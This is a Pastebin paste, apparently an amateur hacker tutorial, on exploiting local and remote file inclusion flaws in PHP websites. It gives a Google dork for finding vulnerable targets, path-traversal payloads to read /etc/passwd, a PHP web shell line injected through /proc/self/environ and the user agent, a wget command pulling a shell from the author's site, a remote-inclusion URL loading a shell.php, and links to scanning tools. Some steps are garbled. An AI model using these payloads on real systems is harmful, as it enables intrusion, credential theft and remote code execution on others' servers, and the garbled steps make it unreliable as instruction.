Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #megafab.net
- //////////////////////////////////////////////////////////////////////////////////////////////////////
- #########################################################################################
- # Tutorial .
- # LFI & RFI Tutorial --
- # Author : M3GAFAB .
- # Greetz - to all my friendS ^_^ <3 !..............!
- ##########################################################################################
- --------------------------------------------------------------------------------------------------------------
- LFI- local file inclusion
- Its include the file of the server in our browser..
- To see if a script is vulnerable to local file inclusion,
- index.php?page=../../../../../../../../../etc/passwd
- That Shows the complete User information in that server with paths..
- Where ../ causes the script to move up one directoryWhere directory,
- Multiple ../ cause the script to move to the top level directory (/, the root of the
- filesystem) and /etc/passwd is the Unix passwd file.
- google dork: inurl:.php?page=
- example:www.targetSITE.com/contacts.php?page=abc.php
- test:www.targetSITE.com/contacts.php?page=../fab.php
- now in linux server server there is etc/password
- 1... www.targetSITE.com/index
- ../
- =../../../etc/passwd
- =../../../etc/passwd%00
- etc/passwdfile
- proc/self/environ is the writable file by end
- or var/log/httpd-access.log is also writable
- proc/self/environ
- add one- user agent switcher
- config.php
- <?php passthru($_GET['cmd']) ?>
- ../proc/self//environ&cmd=wget http://megafab.net/sh3ll O shell.php
- config.php
- ip
- username
- pwd
- Done..
- ----------------------------------------------------------------------------------------------
- RFI - Remote file inclusion
- Remote File Inclusion (RFI) is a type of vulnerability most often found on websites.
- It allows an attacker to include a remote file, usually through a script on the web
- server. The vulnerability occurs due to the use of user-supplied input without
- proper validation. This can lead to something as minimal as outputting the contents
- of the file, but depending on the severity, to list a few it can lead to:
- -> Code execution on the web server
- -> Code execution on the client-side such as JavaScript which can lead to other
- attacks such as cross site scripting (XSS).
- -> Denial of Service (DoS)
- -> Data Theft/Manipulation
- By default allow_url_include is ON -----> in php.ini
- www.targetSITE.com/contacts.php?page=http://www.site.com/shell.php
- -----------------------------------------------------------------------------------------------------------
- Ok now we have a tool called FIMAP is a Local and Remote file inclusion auditing Tool (LFI/RFI).
- Fimap its a simple python tool which can find, prepare, audit, EXPLOIT and even GOOGLE automatically for Local "LFI" and Remote "RFI" file inclusion bugs in WEBSITE's. FIMAP should be something like SQLMAP just for LFI/RFI Bugs , and not SQL Injection ...
- Download at ( https://code.google.com/p/fimap/downloads/list )
- ------------------------------------------------------------------------------------------------------------------
- Ok now im sharing with you a LFI Vulnerability SCANNER that helps you find LFI Vulnerability's .
- Download ( http://megafab.net/lfiscan.txt )
- You need first " PYTHON " installed then open with TERMINAL or CMD ...
- Use it as . ./lfiscan.py –url=
- EXAMPLE - ./lfiscan.py –url=”http://www.target.com/page.php?file=exp
- ####################################################################################################
- cyberz0ne.net
- megafab.net (Official Website)
- twitter.com/M3GAFAB ( Follow )
- facebook.com/m3gafabb ( Like )
- Thanks For Reading .. Sharing Its CarinG .. ^_^
- ./LogOut
- ####################################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement